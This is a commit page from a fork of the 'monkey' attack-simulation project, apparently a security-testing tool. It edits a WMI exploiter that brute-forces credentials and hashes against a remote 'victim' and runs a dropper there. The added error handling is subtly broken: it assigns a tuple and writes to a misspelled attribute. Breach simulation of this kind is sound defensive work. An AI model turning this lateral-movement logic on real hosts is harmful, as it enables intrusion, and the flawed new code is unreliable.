forked from p15670423/monkey
Agent: Add WMI error message to results if exploit failed
This commit is contained in:
Mike Salvatore
parent
040a23546c
commit
54bbe8bf2f
|
|
@ -29,10 +29,12 @@ class WmiExploiter(HostExploiter):
|
|||
def _exploit_host(self) -> ExploiterResultData:
|
||||
|
||||
creds = generate_brute_force_combinations(self.options["credentials"])
|
||||
intp_creds = interruptable_iter(creds,
|
||||
self.interrupt,
|
||||
"WMI exploiter has been interrupted by a stop signal from the Island",
|
||||
logging.INFO)
|
||||
intp_creds = interruptable_iter(
|
||||
creds,
|
||||
self.interrupt,
|
||||
"WMI exploiter has been interrupted by a stop signal from the Island",
|
||||
logging.INFO,
|
||||
)
|
||||
|
||||
for user, password, lm_hash, ntlm_hash in intp_creds:
|
||||
|
||||
|
|
@ -66,6 +68,8 @@ class WmiExploiter(HostExploiter):
|
|||
self.report_login_attempt(True, user, password, lm_hash, ntlm_hash)
|
||||
self.exploit_result.exploitation_success = True
|
||||
|
||||
# TODO: This check is racey at best. Is it really necessary? If we execute an agent on
|
||||
# the victim and there's one already running, it will stop itself.
|
||||
# query process list and check if monkey already running on victim
|
||||
process_list = WmiTools.list_object(
|
||||
wmi_connection,
|
||||
|
|
@ -126,7 +130,7 @@ class WmiExploiter(HostExploiter):
|
|||
self.add_vuln_port(port="unknown")
|
||||
self.exploit_result.propagation_success = True
|
||||
else:
|
||||
logger.debug(
|
||||
error_message = (
|
||||
"Error executing dropper '%s' on remote victim %r (pid=%d, exit_code=%d, "
|
||||
"cmdline=%r)",
|
||||
remote_full_path,
|
||||
|
|
@ -135,6 +139,8 @@ class WmiExploiter(HostExploiter):
|
|||
result.ReturnValue,
|
||||
cmdline,
|
||||
)
|
||||
logger.debug(error_message)
|
||||
self.exploit_results.error_message = error_message
|
||||
|
||||
result.RemRelease()
|
||||
wmi_connection.close()
|
||||
|
|
|
|||
Loading…
Reference in New Issue